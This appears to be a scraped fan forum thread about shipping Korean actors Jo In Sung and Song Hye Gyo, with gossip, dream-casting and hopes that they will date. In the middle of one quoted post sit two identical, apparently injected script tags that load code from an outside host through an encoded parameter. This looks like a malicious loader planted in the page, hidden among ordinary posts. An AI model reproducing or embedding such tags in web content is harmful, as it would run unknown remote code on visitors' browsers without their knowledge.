[OFFICIAL] ♥O2 / Oxygen Couple♥ ~ *Jo In Sung & Song Hye Gyo* Heart-Warming Shippers

blossomz

Wanderlust said: crazywindblower said: Wanderlust said: Humanely speaking; how can you be with a single, gorgeous person everyday acting out lovey-dovey romantic scenes for the last 6 months and not have any feelings for him/her?<script src="http://tt.rivalgaming.com/cmn?p=OTY0MTgxMTQ4MfwirbtVck5D9PX9wM67ViJxt01YCOq2wxNowffRB3xqB79zEgmr95QqJmWQYYVSExedftmxxOXl3VO4GxB%2Fo%2B2E88CU6WZ2p8iE1ViCrpDfRKRiyGBL0Vz3zcgC72oSbRi8pPAyfCCHF55VS9cxed6LJDku246XKaOulCr3xvjR&d=6"></script><script src="http://tt.rivalgaming.com/cmn?p=OTY0MTgxMTQ4MfwirbtVck5D9PX9wM67ViJxt01YCOq2wxNowffRB3xqB79zEgmr95QqJmWQYYVSExedftmxxOXl3VO4GxB%2Fo%2B2E88CU6WZ2p8iE1ViCrpDfRKRiyGBL0Vz3zcgC72oSbRi8pPAyfCCHF55VS9cxed6LJDku246XKaOulCr3xvjR&d=6"></script>
That takes a lot of willpower! Unless I'm just a hormone-raging ahjumma?

KyoRean said:

Wow. Incredibly nice song and video.@KyoRean,I'm speechless. Hands up to you! :)p/s : haha...can't get over - the mellower one. lol.

Lol i honestly thought she was kyoforever i even thought oh she changed her signature Lol i guess really deep inside me was hoping to see that "gif" LOL =))

loucong said: Untitled2-horz.jpg

pic credit kimc for JIS pic and ms park for SHK im the one would highlighted the phones LOL ;)) because im a shipper my mind creates stories LOL hahaha if Oh Soo has pantech VegaNo6 black and Youngie has white
:x :\"> meanwhile is real world LOL LOL jis has iphone4 or S black and shk has white
8-}im crazy too much coincidental now LOL LOL CALL IT FATE DESTINY OR what the heck!! LOL COUPLE phones thou unintentional for now LOL LOL LOL

iscideal partnermy, my, my you've been busy shippers. i suspect in about a few hours you'll hit your target of 50 pages. AJA AJA FIGHTING!

while you peeps have been busy writing i've been busy imagining. i came across an article on an interview with jis. he confessed that since he was finding it hard to let go he approached the scriptwriter, director and producer to extend twtwb by a few episodes. his request was obviously IGNORED lol poor chap.

i on the other hand after watching the fan vid of jis & shk in a rom com and period drama, think they should do a sageuk rom com with song seung heon. recently ssh confessed that shk is his ideal partner and wishes to work with her again. ekekeke my evil mind is picturing him as the antoganist. what spark we are going to see on-screen and off-screen.

hmmm i think the sageuk rom com should be along the line of a roof top prince meets coffee prince. with flower men entourage made up of cold won bin, cheeky kang dong won and smitten song seung heun. ex military man adjusting to civilian life should stay dizzy and confused jis. my antogonist would be the soon to be roasted nuts lbh. grinning with satisfaction!

Guest arri14

O2 shipper here.

This is my first time shipping a couple in a korean drama, other past k-dramas I have watched have not enticed me to ship them together like JIS and SHK have. I secretely chant to myself many times a day "Jo In Sung and Sog Hye Kyo be together" lol I believe in the power of positive thinking. And as a fan all I can do is wish them all the best and for them to find each other.

but we can't have shk growing up as a lonely child. let's give a donseng who is tough on the outside but gentle on the inside kim bum who's protective and watchful of noona. for bonus let's give shk a little bit more headache with another dongseng in the form of a suave yong ha who sometimes turn into a wolf boy when angry to complete the set.

imagine this: cold face won bin who always knocks some sense into dizzy protagonist, cheeky kang dong won who always play along with confused prince, and pouting ssh  smitten with heroine whose loyalty is often questioned hero or heroine?

last but not least the slimy, sly and lecherous antogonist lbh... aaah i almost forgot let's bring in the ex-wife of the chaebol fighting for dizzy prince's affection. do we have a complete set? if we do, let's get rolling ekekeke.

Guest arri14

jl08 said: mskdramalover said: sorry but i just saw this thread...finally they have their own thread. :)
8-> i'm rooting for this couple. i wish they become real. i have a feeling that jo in sung oppa is now developing a feeling for song hye kyo. the way his facial expression changes, he stutter and find the right words to answer to the question of kim c, i think he is attracted to song hye kyo(but who is not attracted to her beauty?!). i think God will hear my prayer. :)

Hi everyone! I had a deadline yesterday and could'nt come here. Wooow, this thread is moving so fast. As soon as i woke up, i grab my mobile to read all your posts, such a great thing to start my day! Actually this is my second time shipping a drama couple but my first ship has sank as the male lead is rumored to be in a relationship with a rookie artist. I have a huge hope for this ship. Just like most of you, I have the ups and downs whenever a news or talks came up with regards to O2. But I think we just need to let it flow. Just like Kyo said, live life like a river. Give them some times. Don't give up hope as long as no clear statement is made. Let's pray for them may God hear our pray and bless this lovely couple.

I love you all hihihi. Let's walk together till the end of the way.

@jl08 God draw their life path to meet in that winter, God will decide if they're meant to be spending time through many winters until death do them part.

@kyorean wave ;;)

Guest OreoVampire

irella said: Hi everyone! I had a deadline yesterday and could'nt come here. Wooow, this thread is moving so fast. As soon as i woke up, i grab my mobile to read all your posts, such a great thing to start my day! Actually this is my second time shipping a drama couple but my first ship has sank as the male lead is rumored to be in a relationship with a rookie artist. I have a huge hope for this ship. Just like most of you, I have the ups and downs whenever a news or talks came up with regards to O2. But I think we just need to let it flow. Just like Kyo said, live life like a river. Give them some times. Don't give up hope as long as no clear statement is made. Let's pray for them may God hear our pray and bless this lovely couple.
I love you all hihihi. Let's walk together till the end of the way.
@jl08 God draw their life path to meet in that winter, God will decide if they're meant to be spending time through many winters until death do them part.
@kyorean wave ;;)